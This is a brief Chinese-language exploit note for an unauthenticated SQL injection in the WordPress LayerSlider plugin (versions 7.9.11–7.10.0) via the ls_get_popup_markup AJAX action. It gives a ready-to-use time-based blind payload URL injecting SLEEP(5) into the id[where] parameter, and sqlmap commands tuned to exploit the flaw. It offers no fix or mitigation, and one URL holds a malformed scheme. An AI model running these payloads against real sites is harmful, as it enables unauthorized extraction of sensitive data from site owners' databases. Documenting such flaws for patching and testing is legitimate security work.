LayerSlider 7.9.11 - 7.10.0 - 未认证SQL注入
WordPress的LayerSlider插件在7.9.11和7.10.0版本中通过ls_get_popup_markup动作存在SQL注入漏洞,原因是用户提供的参数转义不足,且现有SQL查询缺乏充分的预处理。这使得未经认证的攻击者能够将额外的SQL查询附加到已有查询中,从而用于从数据库中提取敏感信息。

"http://site.com/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and (SELECT 6416 FROM (SELECT(SLEEP(5)))nEiK)-- vqlq"
5秒延迟响应时间

sqlmap "https:://site.com/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=" --risk=3 --level=4 --dbms=mysql --technique=T
或
sqlmap -r request.txt --risk=3 --level=4 --dbms=mysql --technique=T